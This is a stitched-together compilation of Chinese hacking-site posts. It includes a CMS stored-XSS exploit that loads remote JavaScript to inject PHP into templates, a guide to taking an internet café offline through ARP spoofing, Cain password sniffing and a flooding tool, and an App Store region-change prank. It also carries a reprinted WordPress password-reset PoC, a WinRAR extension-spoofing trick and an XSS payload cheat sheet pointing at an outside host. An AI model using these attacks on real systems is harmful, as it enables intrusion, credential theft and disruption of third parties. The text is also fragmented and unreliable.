        'meta_title'      => lang('m-inf-1') . '-' . lang('member') . '-' . $this->site['SITE_NAME'],
    ));
    $this->view->display('member/avatar');
}

$data = $this->input->post('data', TRUE);中第二个参数为TRUE表示数据会经过xss_clean()函数进行过滤,然后就进行过滤。xss_clean()其实是很难绕过的,如果输出点在属性值中,产生XSS的可能性就很大。

二、输出点①
前台触发

// controllers\member\SpaceController.php 第35行-44行
$this->view->assign($data);
$this->view->assign(array(
    'meta_title' => lang('m-spa-2', array('1'=>$data['nickname'])) . '-' . $this->site['SITE_NAME'],
    'userid'     => (int)$data['id'],
    'tablename'  => $model['tablename'],
    'modelname'  => $model['modelname'],
    'groupname'  => $this->membergroup[$data['groupid']]['name'],
    'page'       => $this->get('page') ? $this->get('page') : 1,
));
$this->view->display('member/space');

它使用了模板引擎,然后输出到member/space的模板上。

views\new\member\space.html 第14行
<img src="{$avatar}" width="80" height="80" />

因此,这里我们构造的XSS-Payload如下所示。

"onerror=alert(1)>

三、输出点②
后台触发

// controllers\admin\MemberController.php 第72行-84行
$this->view->assign(array(
    'kw'            => $kw,
    'list'          => $data,
    'page'          => $page,
    'count'         => $count,
    'status'        => $status,
    'pagelist'      => $pagelist,
    'membermodel'   => $this->membermodel,
    'membergroup'   => $this->membergroup,
    'memberextend'  => $this->cache->get('model_member_extend'),
    'is_syn'        => $is_syn
));
$this->view->display('admin/member_list');

上面就是出库->赋值->输出的一个过程,下面看看问题模板文件

views\admin\member_list.html 第80行
<a href="javascript:;" onClick="get_avatar('{$avatar}')">{$t['username']}</a></td

因此构造出来的语句就应该是:

');alert(1)">

四、利用
这里数据库对avatar字段有长度限制,因此利用jQuery加载外部的JS代码;并且,从后台找了一个修改模板的地方,利用代码如下:

');(function(){$.getScript('//127.0.0.1/1.js');})()">

JS代码如下

$(document).ready(function(){
    $.ajax({
        type:"POST",
        url:"/index.php?s=admin&c=theme&a=edit&dir=bmV3XGluZGV4Lmh0bWxc",
        data:{file_content:"{php phpinfo();}",submit:"提交"},
        xhrFields: {
            withCredentials: true
        },
        success:function(){
            alert(1)
        }
    });
});

管理员点击用户名之后即会触发XSS->修改模板

中国版苹果手机苹果商店任意更改商店使id失效。

https://itunes.apple.com/ph/app/经过测试,苹果手机点击该链接,会转入菲律宾苹果商店,此时的中国苹果id并不能正常使用该店的所有功能以及下载。

具体整人如下操作:

1点击该链接进去

2苹果手机自动跳转弹出对话框

3点击更改商店按钮

4整人成功

因为此时的商店为全英文。

如果想改回来:关注公众微信,回复关键字:苹果手机id恢复就可以恢复成功了,有教程哟。

中国骇客云教你如何攻击网吧(压力测试)我们只上传工具。

尊敬的用户大家好,好长时间没有发布教程了。因为前些时候在网吧玩儿,突发奇想的想攻击网吧进行压力测试,【lol网吧】带宽不足是所有网吧的通病。
首先一些网吧进行了安全组建以及安全模块禁用一些arp嗅探等工具。因为缺少相应的dll,所以一些工具是不能用的,在这里我们提供一些基本的补丁,通杀所有网吧32位64位的dll。下载地址复制一下进行浏览器粘贴。
点我进行下载    cain的内网渗透工具,因为下载好以后根据网吧机器是32或者64进行dll的补丁安装。
以下讲解了cain的使用教程,如果大家在使用中不会请看完本文即可进行深度学习。那天我们攻击网吧的截图和照片没有了(怕网管查到所以没有进行拍照不好意思大家。)
这一步不会可以直接进行跳过看下一步:


内网渗透的一些基本工具用法:
Cain & Abel 是由Oxid.it开发的一个针对Microsoft操作系统的免费口令恢复工具。号称穷人使用的L0phtcrack。它的功能十分强大,可以网络嗅探,网络欺骗,破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议,甚至还可以监听内网中他人使用VOIP拨打电话。

Abel 是后台服务程序,一般不会用到,我们重点来介绍Cain的使用。

Cain安装:首先我们需要安装Winpcap驱动,

cain内网嗅探工具使用教程 - yes_root - yes_root

一路next便可以安装成功

然后我们就可以使用Cain了,让我们打开传说中的Cain,界面十分简单明了,

cain内网嗅探工具使用教程 - yes_root - yes_root

但是它的功能可就不简单了。

Cain使用:

一、读取缓存密码:切换到“受保护的缓存口令”标签,点上面的那个加号

cain内网嗅探工具使用教程 - yes_root - yes_root

缓存在IE里的密码全都显示出来了。

二、查看网络状况

切换到“网络” 标签,可以清楚的看到当前网络的结构,我还看到内网其他的机器的共享目录,用户和服务,通过上图,我们清楚的看到Smm-DB1开启了IPC$默认共享连接和其他盘隐藏共享。

三、ARP欺骗与嗅探

ARP欺骗的原理是操纵两台主机的ARP缓存表,以改变它们之间的正常通信方向,这种通信注入的结果就是ARP欺骗攻击。ARP欺骗和嗅探是Cain我们用的最多的功能了,切换到“嗅探”标签

cain内网嗅探工具使用教程 - yes_root - yes_root

在这里可以清晰的看到内网中各个机器的IP和MAC地址。

我们首先要对Cain进行配置,先点最单击最上面的“配置”

cain内网嗅探工具使用教程 - yes_root - yes_root

在“嗅探器”中选择要嗅探的网卡,在“ARP(Arp Poison Routing)”中可以伪造IP地址和MAC地址进行欺骗,避免被网管发现

cain内网嗅探工具使用教程 - yes_root - yes_root

在“过滤与端口”中可以设置过滤器,

cain内网嗅探工具使用教程 - yes_root - yes_root

可以根据自己的需要选择过滤的端口,如嗅探远程桌面密码的话,就钩选RDP 3389端口。

小提示:比如我要嗅探上面的61.132.223.10机器,第二个网卡显示我的ip地址为61.132.223.26,和目标机器是同一内网的,就使用第二个的网卡欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

单击网卡的那个标志开始嗅探,旁边的放射性标志则是ARP欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

cain内网嗅探工具使用教程 - yes_root - yes_root

  嗅探了N久之后,点击下面的 “截获密码”, 嗅探所得到的密码会按分类呈现在大家面前,包括http、ftp、VNC、SMTP、ICQ等密码。如果目标主机使用voip电话的话,还可以获得他使用voip电话的录音(恐怖吧),如图

cain内网嗅探工具使用教程 - yes_root - yes_root

  cain内网嗅探工具使用教程 - yes_root - yes_root  下面我们来进行Arp欺骗,点击下面的“ARP”标签, 

cain内网嗅探工具使用教程 - yes_root - yes_root

 在右边的空白处单击,然后点上面的“加号”,出现“新建ARP欺骗”对话框,在左边选网关,右边选择被欺骗的IP。

这里要注意的是,你的机器性能比网关差的话,会引起被欺骗机器变慢。

1.DNS欺骗:

在“DNS欺骗”中填入请求的DNS名称和响应包的IP地址,

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,当目标地址访问www.hao123.com的时候就自动跳转到Www.google.cn的网站上面,其中的“#resp. 欺骗”就是目标主机被欺骗的次数。

这样对于目标机器进行挂马也不失为一种绝妙的方法。点上面的放射性标志开始Arp欺骗,

小提示:网关IP可以在命令行下输入ipconfig获得

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,网关IP为61.132.223.4

2.远程桌面欺骗:

Cain能够实行中间人攻击(Man-In-The-Middle)远程计算机的终端服务协议(Remote Desktop Protocol RDP)进行截获和解密工作。也就是截获目标主机的3389登陆密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

在“ARP-RDP”里已经得到了3个数据包。右击右边得到的数据包,选择“查看”,

cain内网嗅探工具使用教程 - yes_root - yes_root

我的运气比较好,获得了目标主机登陆3389的用户和密码,如图,用户名为“administrator”密码为“asdf1234”。

小技巧:在肉鸡上对密码进行嗅探的时候,可以按Alt +Delete对界面进行隐藏,按Alt + Page Down隐藏都任务栏,按Alt +Page up呼出界面。这个技巧在内网渗透的时候非常有用!

四、密码的破解

Cain还具有强大的破解功能,可以破解md5,md4,pwl,mssql等加密的密文,我这里示范如何使用Cain破解md5密文。

cain内网嗅探工具使用教程 - yes_root - yes_root

切换到“破解器”标签,在右边空白处单击,按上面的加号,输入我们要解密的32位密文

cain内网嗅探工具使用教程 - yes_root - yes_root

右击要破解的密文,选择“暴力破解”,选择口令长度和密码范围,我这儿选择的是5到6位纯数字密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

按“开始”进行破解

cain内网嗅探工具使用教程 - yes_root - yes_root

一会儿工夫,破解出的密码就出现在我们面前了,哈哈,密码是123456。除了暴力破解以外,你还可以使用通过字典破解和通过rainbow表进行破解。

其他还有一些常用密码的读取可以参照下图

cain内网嗅探工具使用教程 - yes_root - yes_root

使用十分简单,大家自己研究下就行了,密文计算器的效果如图:

cain内网嗅探工具使用教程 - yes_root - yes_root

可以对密文进行md2,md5,lm,nt等方式进行加密

五、追踪路由

切换到“追踪路由”标签,在目标主机中填入目标主机的ip或者域名,我这填www.hackerxfiles.net

cain内网嗅探工具使用教程 - yes_root - yes_root

选择协议和端口,点“开始”,一杯咖啡过后,就可以清晰的看到访问黑X  BBS所经过的所有服务器IP、访问所需的时间和主机名。

另外,Cain还具有“LSA分析”和“嗅探无线网络”等功能,这些功能我们不经常用到,感兴趣的朋友可以自行研究。最新版本cain4.92已经加入vista支持,但是“读取读取缓存密码”功能不是很稳定,如果要读取读取缓存密码的话请使用以前的版本。最后要说一句:Cain的确是一款绝佳的黑界利器,威力无穷,请各位小黑们谨慎使用。


第二步:下载网络超级邻居和p2p网络终结者。
网络超级邻居可以检测内网所有上线主机与共享主机,并且可以进行开放端口检测与服务器主机的检测,具体参考我们的网络超级邻居的使用方法如下:
打开网络超级邻居直接嗅探整个网吧的上线主机,扫描开放端口,135.3389.1433等端口…搜索开放端口的在线主机,共享本机到所有开放主机文件等。
p2p网络终结者可以在百度任意下载,如果缺少部分dll可以添加cain的dll进行安装和使用。
因为网络超级邻居和p2p网络终结者cain的共同性,都可以进行局域网扫描,所以这个就得看个人经验找到相应的服务器主机和安全模块的服务器主机地址了。这里可以使用三个进行经验判断和扫描结果。以后有图了给大家补下。
网络超级邻居下载地址:http://www.crsky.com/soft/2700.html

p2p网络终结者下载地址:http://www.cr173.com/soft/1953.html
因为
这里个软件百度随便一个下载站点都可以下载到,所以如果上面两个软件失效了,请百度一下吧。


第三步:蜗牛攻击器终极版下载地址:https://binghesoft.ctfile.com/file/117068576    这个如果不能使用,百度一下(蜗牛攻击器终极版)|


第四步:打开蜗牛攻击器,p2p网络终结者,网络超级邻居。
蜗牛攻击器输入攻击目标主机:192.168.xxx.xxx
增加蜗牛
切记不要使自己的机器卡死,增加4到5个都可以,模式自己搞。
p2p网络终结者全局控制,黑名单。起到了一定的arp的效果。但不是欺骗。
cain去嗅探主机的账户密码。【这一步不会的话可以使用上面几步】


第五步:等7到8分钟整个网吧会掉线,这里的cain其实没有起到多大的作用,说这个是为了网大家去嗅探一些简单的局域网密码算是一种爆破工具吧~内网扫描工具等。


如果网吧不掉线:两台机器同时攻击.直接秒死…经过测试所有网吧都可以进行秒杀,因为网吧的安全问题和带宽的响应问题..导致网吧直接秒死是正常的………..之前去了网吧做测试..所以没有敢拍照和录像..有机会一定弄,不会的关注我们官方公众微信,进行留言,我们会有专门的客服教你喔~~~

中国骇客云之WordPress曝未经授权的密码重置漏洞0day漏洞

漏洞提交者:Dawid Golunski

漏洞编号:CVE-2017-8295

发布日期:2017-05-03

修订版本:1.0

漏洞危害:中/高

I. 漏洞

WordPress内核<= 4.7.4存在未经授权的密码重置(0day)

II. 背景

WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。截止2017年2月,Alexa排名前1000万的站点中约有27.5%使用该管理系统。据报道有超过6000万站点使用WordPress进行站点管理或者作为博客系统。

III. 介绍

WordPress的重置密码功能存在漏洞,在某些情况下不需要使用之前的身份令牌验证获取密码重置链接。
该攻击可导致攻击者在未经授权的情况下获取用户Wordpress后台管理权限。

IV. 描述

该漏洞源于WordPress默认使用不可信的数据。当生成一个密码重置邮件时应当是仅发送给与帐户相关联的电子邮件。
从下面的代码片段可以看出,在调用PHP mail()函数前创建了一个From email头

------[ wp-includes/pluggable.php ]------...if ( !isset( $from_email ) ) {        // Get the site domain and get rid of www.        $sitename = strtolower( $_SERVER['SERVER_NAME'] );        if ( substr( $sitename, 0, 4 ) == 'www.' ) {                $sitename = substr( $sitename, 4 );        }        $from_email = 'wordpress@' . $sitename;}...-----------------------------------------

正如我们所看到的,Wordpress为了生成重置邮件创建的一个From/Return-Path(发件人/收件人)头,使用SERVER_NAME变量以获取服务器的主机名。

然而,诸如Apache的主流web服务器默认使用由客户端提供的主机名来设置SERVER_NAME变量(参考Apache文档)
由于SERVER_NAME可以进行修改,攻击者可以任意设置该值,例如attackers-mxserver.com
这将导致Wordpress的$from_email变为wordpress@attackers-mxserver.com,最终导致包含From/Return-Path(发件人/收件人)设置的密码重置邮件发送到了该恶意邮件地址。

至于攻击者可以修改哪那一封电子邮件的头信息,这取决于服务器环境(参考PHP文档)
基于邮件服务器的配置,可能导致被修改过邮件头的恶意收件人/发件人地址的电子邮件发送给WordPress用户。
这使得攻击者能够在不需要进行交互就可以截取本该是需要进行交互才能进行的操作的密码重置邮件。

攻击场景:

如果攻击者知道用户的电子邮件地址。为了让密码重置邮件被服务器拒收,或者无法到达目标地址。他们可以先对用户的电子邮件帐户进行DoS攻击(通过发送多个超过用户磁盘配额的大文件邮件或攻击该DNS服务器)
某些自动回复可能会附加有邮件发送副本
发送多封密码重置邮件给用户,迫使用户对这些没完没了的密码重置邮件进行回复,回复中就包含的密码链接会发送给攻击者。

V. POC

如果攻击者将类似下面的请求发送到默认可通过IP地址访问的Wordpress安装页面(IP-based vhost):

-----[ HTTP Request ]----POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1Host: injected-attackers-mxserver.comContent-Type: application/x-www-form-urlencodedContent-Length: 56user_login=admin&redirect_to=&wp-submit=Get+New+Password------------------------

WordPress将触发管理员账户的密码重置功能
由于修改了主机头,SERVER_NAME变量将被设置为攻击者所选择的主机名,因此Wordpress会将以下电子邮件头信息和正文传递给/usr/bin/sendmail

------[ resulting e-mail ]-----Subject: [CompanyX WP] Password ResetReturn-Path: <wordpress@attackers-mxserver.com>From: WordPress <wordpress@attackers-mxserver.com>Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>X-Priority: 3MIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bit

有人请求将以下账户的密码进行重置:

http://companyX-wp/wp/wordpress/Username: admin

如果是弄错了,直接忽略该邮件就好。重置密码请访问以下地址:

http://companyx-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin%3E

正如我们看到的,Return-Path, From, 以及Message-ID字段都是攻击者控制的域
通过bash脚本替换/usr/sbin/sendmail以执行头的验证:

#!/bin/bashcat > /tmp/outgoing-email

VI. 业务影响

在利用成功的基础上,攻击者可重置用户密码并且未经授权获取WordPress账户访问权限。

VII. 系统影响

WordPress至最新版本4.7.4全部受影响

VIII. 解决方案

目前没有官方解决方案可用。作为临时解决方案,用户可以启用UseCanonicalName执行SERVER_NAME静态值(参考Apache)

IX. 参考文献

https://legalhackers.com
https://ExploitBox.io

Vendor site:

https://wordpress.org
http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname
http://php.net/manual/en/function.mail.php
https://tools.ietf.org/html/rfc5321

中国骇客云0day漏洞库最新WinrRar4.2 扩展名欺骗0Day

1.首先我们压缩一个exe可执行文件,是个弹出PWNED的小程序

2.用winrar的zip模式压缩exe文件

3.把压缩的zip文件载入hex软件,找到文件名,更改第二个文件名后缀为 jpg,保存zip文件

4.打开zip,双击里面的图片,将允许你的exe文件
更多0day漏洞尽在中国骇客云平台 官网:www.hackerschina.org

 

中国骇客云平台近日发现两处针对大部分浏览器的欺骗漏洞0day漏洞。

主要都是针对主流浏览器的漏洞

由于部分厂商漏洞未修复,所以均采用chrome进行测试。

0x01

针对主流浏览器的网址欺诈漏洞 (1)

漏洞原理

Baloch在个人网站中说,出现漏洞的主要原因是Chrome和Android版本的Firefox浏览器对某些Unicode字符的渲染不得当。阿拉伯语和希伯来语中会有一些字符是会从右到左显示的,比如“|”。当包含这种Unicode字符的URL和IP地址合在一起时,浏览器就会把URL从右到左显示。

举个例子,某个网址逻辑上的顺序是“127.0.0.1/|/http://example.com/”,但是浏览器会在地址栏中把网址显示成“http://example.com/|/127.0.0.1”。

经过翻转的网址IP地址部分其实是很容易隐藏的,尤其是在移动设备上,只要用一个比较长的URL(google.com/fakepath/fakepath/fakepath/… /127.0.0.1)就行了。如果要想网址看起来更真实一点,还可以弄个SSL证书。

漏洞重现

Chrome

(使用了Mac端的Chrome访问PoC网站成功,iOS 手机端成功。ps:pc端,无法测试成功)

1) 访问链接http://182.176.65.7/%EF%B9%B0/http://google.com/test

2) 应该能注意到,浏览器显示的不是google的内容,但是网址却是http://google.com/test/182.176.65.7

0x02

针对大部分网站的网站欺骗漏洞 (2)

国外网友近日曝出大部分网站都忽视了的安全漏洞,包括 Facebook,Twitter,Google 等都被检测出带有 The target=”_blank” 安全缺陷。

你可以点击 http://tvvocold.coding.me/target_blank_vulnerability/ 测试这个安全问题。带有 target=”_blank” 跳转的网页拥有了浏览器 window.opener 对象赋予的对原网页的部分权限,这可能会被恶意网站利用。

<script language="javascript">window.opener.location = 'https://example.com'</script>

漏洞修复方法:为 target=”_blank” 加上 rel=”noopener noreferrer” 属性。

预计该“安全漏洞”影响了 99% 的互联网网站和大部分浏览器,Instagram 已修复这个问题,有趣的是谷歌拒绝修复这个问题,谷歌认为“这属于浏览器缺陷,不能由单一的网站进行有意义的缓解”。

这个漏洞的可能的利用场景:例如一个恶意网站在用户在 Facebook 打开其页面时,将原页面跳转到伪造的 Facebook 页面,而用户返回到原 tab 时可能会忽视浏览器 URL 已发生了变化,伪造页面即可进一步进行钓鱼或其他恶意行为…

漏洞重现

Chrome

(使用了Mac端的Chrome访问PoC网站成功。)

1)浏览器访问 poc网站:

http://tvvocold.coding.me/target_blank_vulnerability/ 发现原网址为:

别的终端未测试:(

其他浏览器以及网站也存在漏洞,但由于厂商尚未修复漏洞,因此作者还不能透露相关细节。

中国骇客云平台最新0day漏洞!微信被曝跨站脚本漏洞 最新微信漏洞xss漏洞!

跨站攻击(Cross Site Scripting)是由于程序员在编写程序时对用户提交的数据没有做充分的合规性判断和进行HTML编码处理,直接把数据输出到浏览器客户端,这样导致用户可以提交一些特意构造的脚本代码或HTML标签代码,并在输出到浏览器时被执行。黑客利用跨站漏洞输入恶意的脚本代码,当恶意的代码被执行后就形成了所谓的跨站攻击。利用跨站漏洞黑客可以在网站中插入任意代码,这些代码的功能包括获取网站管理员或普通用户的cookie,隐蔽运行网页木马,甚至格式化浏览者的硬盘,只要脚本代码能够实现的功能,跨站攻击都能够达到,因此跨站攻击的危害程度丝毫不亚于溢出攻击

朋友圈再次炸开了锅,打开朋友圈,发现组织代码,分享到朋友圈,就可以弹窗。微信方面并未对此事发表任何官方声明,朋友圈被彻底玩坏!来不及解释了,快上图!更多关注最新0day漏洞发布网!www.hackerschina.org

搜索一下,打开就会弹窗了。 

具体操作流程:分享格式发送朋友圈,在定位处添加模板代码,这样的

1< img src=1 onerror=confirm(“弹窗”);prompt(“呵呵”);>

 

附,Img xss 姿势

(1)普通的XSS JavaScript注入

<script src=”http://www.hackerschina.org/XSS/p.js”></script>

(2)IMG标签XSS使用JavaScript命令

<script src=”http://www.hackerschina.org/XSS/p.js”></script>

(3)IMG标签无分号无引号

<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)

<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签

<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S’)>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S’)>
(10)十六进制编码也是没有分号(计算器)
<IMG SRC=java..省略..XSS’)>
(11)嵌入式标签,将Javascript分开
<IMG SRC=”javascript:alert(‘XSS’);”>

更多关注我们官方公众微信喔!!!!!最新0day漏洞!